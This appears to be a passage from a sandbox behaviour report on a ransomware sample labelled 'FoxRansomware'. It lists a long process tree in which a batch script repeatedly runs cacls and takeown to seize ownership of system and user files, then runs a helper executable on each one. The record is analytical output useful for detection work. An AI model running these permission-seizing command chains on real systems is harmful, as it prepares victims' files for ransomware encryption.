- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:4244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:6328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    PID:720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6376
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4240
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin""
  2⤵
  PID:6888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin" /E /G Admin:F /C
    3⤵
    PID:6824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin"
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000006.bin" -nobanner
    3⤵
    PID:1104
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000006.bin" -nobanner
      4⤵
      PID:6364
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin""
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin" /E /G Admin:F /C
    3⤵
    PID:6976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin"
    3⤵
    PID:6892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000000J.bin" -nobanner
    3⤵
    PID:5788
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000000J.bin" -nobanner
      4⤵
      PID:4092
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin""
  2⤵
  PID:6248
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin" /E /G Admin:F /C
    3⤵
    PID:6516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin"
    3⤵
    - Modifies file permissions
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000000U.bin" -nobanner
    3⤵
    PID:5308
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000000U.bin" -nobanner
      4⤵
      PID:5804
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin""
  2⤵
  PID:5812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin" /E /G Admin:F /C
    3⤵
    PID:6632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin"
    3⤵
    PID:744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000018.bin" -nobanner
    3⤵
    PID:5984
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000018.bin" -nobanner
      4⤵
      PID:5212
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin""
  2⤵
  PID:4060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin" /E /G Admin:F /C
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin"
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000052.bin" -nobanner
    3⤵
    PID:6336
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000052.bin" -nobanner
      4⤵
      PID:2184
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""
  2⤵
  PID:6388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"
    3⤵
    - Modifies file permissions
    PID:7072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
    3⤵
    PID:5996
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
      4⤵
      PID:7024
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""
  2⤵
  PID:1016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:7084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
    3⤵
    PID:5892
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
      4⤵
      PID:7140
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""
  2⤵
  PID:4424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"
    3⤵
    PID:6924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
    3⤵
    PID:5268
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
      4⤵
      PID:6132
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin""
  2⤵
  PID:6052
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin" /E /G Admin:F /C
    3⤵
    PID:5584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin"
    3⤵
    - Modifies file permissions
    PID:6100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000006U.bin" -nobanner
    3⤵
    PID:5644
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000006U.bin" -nobanner
      4⤵
      PID:6224
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin""
  2⤵
  PID:5736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin" /E /G Admin:F /C
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin"
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000078.bin" -nobanner
    3⤵
    PID:1272
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000078.bin" -nobanner
      4⤵
      PID:5444
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin""
  2⤵
  PID:5208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin" /E /G Admin:F /C
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin"
    3⤵
    - Modifies file permissions
    PID:3952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000007I.bin" -nobanner
    3⤵
    PID:6092
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000007I.bin" -nobanner
      4⤵
      PID:5440
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin""
  2⤵
  PID:3376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin" /E /G Admin:F /C
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin"
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000008H.bin" -nobanner
    3⤵
    PID:3404
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000008H.bin" -nobanner
      4⤵
      PID:2288
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5847d931-f310-41e0-94f3-5ff45c053f4c.1.etl""
  2⤵
  PID:2352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5847d931-f310-41e0-94f3-5ff45c053f4c.1.etl" /E /G Admin:F /C
    3⤵
    PID:4148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5847d931-f310-41e0-94f3-5ff45c053f4c.1.etl"
    3⤵
    PID:6856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "UpdateSessionOrchestration.5847d931-f310-41e0-94f3-5ff45c053f4c.1.etl" -nobanner
    3⤵
    PID:3668
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "UpdateSessionOrchestration.5847d931-f310-41e0-94f3-5ff45c053f4c.1.etl" -nobanner
      4⤵
      PID:6708
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:6048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:7004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "background.png" -nobanner
    3⤵
    PID:4716
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "background.png" -nobanner
      4⤵
      PID:5496
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:2192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:6628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    PID:6616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:6220
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:1812
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""
  2⤵
  PID:5244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:6364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"
    3⤵
    PID:6768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner
    3⤵
    PID:6556
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner
      4⤵
      PID:5568
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"
    3⤵
    PID:672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner
    3⤵
    PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner
      4⤵
      PID:6592
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""
  2⤵
  PID:2084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner
    3⤵
    PID:5804
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner
      4⤵
      PID:4208
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:3700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:5236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    PID:5632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:6964
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:6608
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:6928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:6780
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:6692
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin""
  2⤵
  PID:6396
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin" /E /G Admin:F /C
    3⤵
    PID:6140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin"
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000000C.bin" -nobanner
    3⤵
    PID:5388
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000000C.bin" -nobanner
      4⤵
      PID:5048
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin""
  2⤵
  PID:6792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin" /E /G Admin:F /C
    3⤵
    PID:6332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin"
    3⤵
    PID:7084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000000O.bin" -nobanner
    3⤵
    PID:2320
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000000O.bin" -nobanner
      4⤵
      PID:1592
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin""
  2⤵
  PID:7032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin" /E /G Admin:F /C
    3⤵
    PID:5456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin"
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000012.bin" -nobanner
    3⤵
    PID:7156
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000012.bin" -nobanner
      4⤵
      PID:2672
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin""
  2⤵
  PID:1208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin" /E /G Admin:F /C
    3⤵
